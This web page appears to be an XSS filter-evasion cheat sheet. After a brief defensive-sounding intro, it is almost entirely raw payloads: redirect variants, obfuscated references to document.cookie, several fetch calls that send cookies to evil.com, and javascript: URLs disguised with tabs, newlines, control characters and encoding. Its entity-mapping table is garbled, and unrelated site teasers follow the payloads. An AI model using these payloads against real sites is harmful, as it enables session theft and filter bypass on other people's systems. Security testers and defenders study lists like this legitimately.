This article dives into the sophisticated realm of Cross-Site Scripting (XSS) attacks, specifically focusing on bypassing security filters that are designed to thwart these intrusions.
It showcases a wide array of techniques and strategies for evading detection, from manipulating document properties to exploiting character encoding vulnerabilities.
Through detailed examples, it aims to equip developers and security professionals with the knowledge to recognize and defend against these complex XSS vulnerabilities.
document.location=
document['location']=
window.location=
this["window"]["location"]=
document.location.href=
location.href=
location=
window.location.assign()
window['location']['href']=
document.location.replace()
window.open("link", "_blank"); //google.com/?=a
//134744072:1234/?a= (decimal ip) document.cookie
document['cookie']
with(document)alert(cookie)
doc\u0075ment.cookie
doc\u0075ment['cookie']
window["doc"+"ument"]["cookie"] fetch("//evil.com/?c="+document.cookie)
fetch("//evil.com/?c=".concat(document.cookie))
fetch("//evil.com/?c=", document.cookie].join())
fetch(`//evil.com/?c=${document.cookie}`) <!--javascript -->
javascript:alert(1)
JaVaScript:alert(1)
ja	vascript:alert(1)
java\tscript:alert(1)
ja
vascript:alert(1)
ja
vascript:alert(1)
javascript:alert()
javascript:alert('XSS')
# tab (0x9), newline (0xa) and carriage return (0xd) allowed (inside or after the protocol)
ja
vascript:alert(1) # New line
jav asc ript :alert(1) # Tab
# Special Characters before the protocol (Raw or encode)
# \x01-\x20 are allowed - Somes Example :
http://www.unicode-symbol.com/u/0017.html
http://www.unicode-symbol.com/u/0008.html
javascript:alert('Successful XSS') # ETB HTML
javascript:alert(1) # Backspace HTML
# colon
javascript:alert()
javascript:alert()
javascript:alert(1)
javascript:alert()
# javascript://
javascript://%0Aalert(1)
javascript://%0Dalert(1)
# target="_blank"
- Scroll Click
- Shift + Click
- Ctrl + Click
# alert
javascript:alert()
javascript:alert``
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
#JS unicode
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074`` ' -> '
" -> "
` -> `
` -> `
( -> (
) -> )
{ -> {
} -> }
& -> &
< -> <
> -> >
\n -> 

\t -> 	
nbsp ->
\ -> \ Learning Without Walls Remote education has long been a lifeline for students in rural areas…
Have you ever come across a picture on the internet and wondered where it came…
Overview WhatsMyName is a free, community-driven OSINT tool designed to identify where a username exists…
Managing disk usage is a crucial task for Linux users and administrators alike. Understanding which…
Efficient disk space management is vital in Linux, especially for system administrators who manage servers…
Knowing how to check directory sizes in Linux is essential for managing disk space and…